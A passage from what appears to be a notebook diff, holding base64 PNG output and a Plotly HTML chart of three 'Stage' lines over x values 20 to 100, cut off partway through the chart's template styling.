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9o4kaf6KLXqhVZqebdlJI6d8Ff1hr+U3bumjLsP1RLMUtWrbV9+cu2L4t6Bkx4E4EREREREREREREQUiDsSJiIiIiIiIiIiIKBBxIE5EREREREREREREgYgDcSIiIiIiIiIiIiIKRByIExEREREREREREVEg4kCciIiIiIiIiIiIiAIRB+JEREREREREREREFIg4ECciIiIiIiIiIiKiQMSBOBEREREREREREREFIg7EiYiIiIiIiIiIiCgQcSBORERERERERERERIGIA3EiIiIiIiIiIiIiCkQciBMRERERERERERFRIOJAnIiIiIiIiIiIiIgCEQfiRERERERERERERBSIOBAnIiIiIiIiIiIiokDEgTgRERERERERERERBSIOxImIiIgo6eXmHdXzb3ROyp/1drt+Wvz19qT8WQ+XzNeZaE2attFTzVPVrvto5eUX6snXUurl677xcW89+VqK/vZ/6fXy9YiIiIiILONAnIiIiIgeuRats9WkaZs4f3iprSTpuzt3dbSwKClf65cOxKfOX6tX389UTU1N3Oe+v/dAf3q1vbbsOvSrf3ZDOxA/e6FYkpJ+IH7ru++VNXSG/vfNz/RU8w76uOsInTp3Ofr5XfuPcyBORERERIGIA3EiIiIieuRatM7W+JkrVFx24yEVSf9av3Qgfv3mt/rDS22Vf+xM3OeWrt2hv7yZpnC46lf/7KAciH+aOUafZo5R0eVSlVyrUO8Rs/RCqzRFItWSOBAnIiIiouDEgTgRERERPXItWmdr7tJNv/j5nx407z5wQs3+
1UM52w7orU/66sW3u6pTr/G6dz8kSaqurtG46cvV9J10/enV9nq7XT8dPHo6+mf92iNTOmaPV/bwmXEff7/DII2ZtlSSVH7jljr3nqDn3+ispu+kq++o2bp770Hc69yYmx93KJzef4pGTF4sSRozban6jPxSg8cv0KvvZ6rpO+nanndEi7/epjc+7q0XWqXpy682RH+v88MaPH6Bnn+js55r2UntM8fqSsn1X/x39vCB+LMtOyk376heeT9TT76Wos96T9SDkPe7XsuiVdtUdr0y+s8Xr15Tk6ZtdP3mt5I4ECciIiKi4MSBOBERERE9co9yIJ6XX6g/vdpeI6d8pZqaGj0IeXrl/UwtWLFFkrQyZ7deaJWmi1evyXO+5izdqOf/0Tn67u5fOxDfsfeonmiWovsPvOjHfjzsvVxcrpqaGrVq21d9R83WvfshVX57Rx93HaG0PhPjXudvHYh/PmO5nn69gwpOnJMkTZi1Us+27KSp89ZIkvKPndF///0T3b5zT5I0dvoyfdRluCoqb8v5YU38cpVe+3dPVUUiP/t3efhA/IlmKeoz8kt9d+euissq9OLbXbVw5dbf9Vp+2p279zV4/AK93a6fqqt/eNwMB+JEREREFJQ4ECciIiKiR+5RD8SbNG0TczibPXymBn0+X9IP76T+7s7d6Odu37mnJk3b6FJxuaRfPxCvikT04ttdtTJnd/RjPx5ES9LJ0xfjvva+w6f0X39rq/sPvEc+EP9n6sDo5378e935/r4kKVwVUZOmbfTNuSuqqanRU81TdejY2eivj0Sq9eRrKTEf+2kPH4g3adpGld/eiX4+a+iM6L+zR3ktP+3lf3ZTk6Zt9FGX4TF/NgfiRERERBSUOBAnIiIiokeuRets/dff2uoPL8V6u10/SfEH4k80i30edr/Rc9R7xCxJ0p3v72vQ5/PV8qNeevmf3aKHtj8eDv/agbj0w7ujP+g8VNIPh84vvt1V67bukyRtyD2o/33zs5hfX1xWoSZN2+j8pdJHPhD/rPfE6OcOHTurP77cLubX/+GltjpaeF43b93+2R862qRpG63elPezf4+HD8T//Gr7X/x39iivJfbvfkOHj59VWp+JertdP3nOl8SBOBEREREFJw7EiYiIiOiRa9E6W2OmLlXR5dIYxWU3JMUfiD/8AyJ/eribPXym/tVpiG7eui1Junc/9EgH4iXXKqKPSNl94ISebdkpetC7Ifeg/vJmWsyvLy67oSZN26jo8m8fiHftNznmQPzHR61I//8Q+pVPY379j4fQld/eifk71Kbf+qGaDx+I1/a1/Fzhqoiefr2DNu88JIkDcSIiIiIKThyIExEREdEj96iPTPm1w91m/+oR88iTg0dPP9KBuCS16zZaX8xdrR5DpmnYxIXRjxeevRz3yJQ9B0/oDy+11YNQ7CNTduw9Gnd4/s/Ugb/rQFySnmreIfpO9R/76Q+2fLi6OhC/9d33avavHiq6XBr9XHV1jZ5+vYO27OJAnIiIiIiCFQfiRERERPTIJfNA/OOuI5Q9fKaqq2t08UqZOmR9rv/5ezvtOXhCUu0OxDftyNc/Puqlp5p30LmLJTGfe+fT/howdq4ehDxdv/mt/tVpiLoPmhr3Oi8Vl6tJ0zY6U3RVkrT7wAk91bzD7z4QHzt9mV7/MEuXi8sVropoyZpcPdeyU8wPAP1pdfkO8Q86D1XrtOE6e6FYpeU3NWLyYj3TomP0OeIciBMRERFRUOJAnIiIiIgeuWQeiBeevaw3Pu6tp5qn6qMuw1X8/9q5e5YuoDCMw9+nzZQgA8UhE0FBkCAQA8mXVCQECVs0FUTEpKmhwJfZr+Kg0CIugoNJ4FSmDo+D0CJBQsYf7utaz4HnnPXH4Rx/q3fLn+tR91jt7h/8VRC/vLyq1t6Jej4yf2vt6PikhqZXqunpq+rof1PvP2zVj5/nt85ZVfXxy0619U1V98DbWlzfrrnVjVpcv3lxftcIff7roubX
Nutxz3g97ByuF68Xau/r4R/vcJ9B/PT7Wc0sfKonvZPV0jVaA5NLtbt/8HuvIA4AQApBHAAAGsBd/xz/lwRxAABSCOIAANAABHEAALh/gjgAADSAB+0vq6VrpIamV/7r3J7B2Wp+NiyIAwAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABEEcQAAAAAAIgjiAAAAAABEEMQBAAAAAIggiAMAAAAAEEEQBwAAAAAggiAOAAAAAEAEQRwAAAAAgAiCOAAAAAAAEQRxAAAAAAAiCOIAAAAAAEQQxAEAAAAAiCCIAwAAAAAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABGuAWuGU1+u9CwfAAAAAElFTkSuQmCC",
+ "text/html": [
+ "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"
#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"
ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"co
